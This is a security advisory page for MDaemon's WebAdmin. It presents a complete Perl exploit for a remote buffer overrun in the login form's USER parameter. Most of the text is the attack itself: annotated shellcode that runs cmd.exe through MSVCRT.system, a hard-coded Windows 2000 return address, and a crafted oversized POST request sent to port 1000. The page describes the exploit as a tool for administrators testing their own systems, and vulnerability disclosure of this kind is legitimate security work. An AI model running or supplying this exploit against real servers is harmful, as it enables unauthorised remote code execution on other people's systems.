|
|
|
|
| |
| WebAdmin allows administrators to securely manage MDaemon, RelayFax, and WorldClient from anywhere in the world. As we reported in our previous article: Remote System Buffer Overrun in WebAdmin.exe, there is a remotely exploitable buffer overrun in the USER parameter. The following exploit code can be used by administrators to test their system for the mentioned vulnerability. |
| |
Credit:
The information has been provided by Noam Rathaus and Ami Chayun of SecurITeam Experts.
|
| |
Exploit:
The exploit code below will simply open up a cmd.exe shell, the exploit code has been hard coded to use Windows 2000 addresses, though it is simple enough to modify it to use other addresses.
#!/usr/bin/perl
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => "1000",
);
unless ($remote) { die "cannot connect to http daemon on $host" }
$remote->autoflush(1);
$shellcode = join ("",
"\x90", # - NOP
"\xCC", # - INT3
"\x90", # - NOP
"\x90", # - NOP
"\x90", # - NOP
"\x90", # - NOP
"\x8B\xEC", # - MOV EBP, ESP
"\x55", # - PUSH EBP
"\x8B\xEC", # - MOV EBP, ESP
"\x33\xFF", # - XOR EDI, EDI
"\x57", # - PUSH EDI
"\x83\xEC\x04", # 0 SUB ESP, 4
"\xC6\x45\xF8\x63", # - MOV BYTE PTR SS:[EBP-8],63h
"\xC6\x45\xF9\x6D", # - MOV BYTE PTR SS:[EBP-7],6Dh
"\xC6\x45\xFA\x64", # - MOV BYTE PTR SS:[EBP-6],64h
"\xC6\x45\xFB\x2E", # - MOV BYTE PTR SS:[EBP-5],2Eh
"\xC6\x45\xFC\x65", # - MOV BYTE PTR SS:[EBP-4],65h
"\xC6\x45\xFD\x78", # - MOV BYTE PTR SS:[EBP-3],78h
"\xC6\x45\xFE\x65", # - MOV BYTE PTR SS:[EBP-2],65h
"\xB8\xC3\xAF\x01\x78", # - MOV EAX, MSVCRT.system
"\x50", # - PUSH EAX
"\x8D\x45\xF8", # - LEA EAX, DWORD PTR SS:[EBP-8]
"\x50", # - PUSH EAX
"\xFF\x55\xF4", # - CALL DWORD PTR SS:[EBP-C]
"\x5F" # - POP EDI
);
$eip = "\xD6\xBF\x53\x07";
$data = join("", "User=", "A"x168, $eip, $shellcode, "A"x1500, "&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In");
$data_length = length($data);
$request = join ("", "POST /WebAdmin.dll?View=Logon HTTP/1.1\r\
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r
Referer: http://localhost:1000/\r
Accept-Language: en-us\r
Content-Type: application/x-www-form-urlencoded\r
Accept-Encoding: gzip, deflate\r
User-Agent: MyUser Agent\r
Host: localhost\r
Content-Length: $data_length\r
Connection: Keep-Alive\r
Cache-Control: no-cache\r
Cookie: User=SECURITEAM; Lang=en; Theme=Standard\r
\r
$data");
print "Sending this [$request]\n";
print $remote $request;
sleep(1);
close $remote;
|
|
|
|
|
|
|
|
|
|
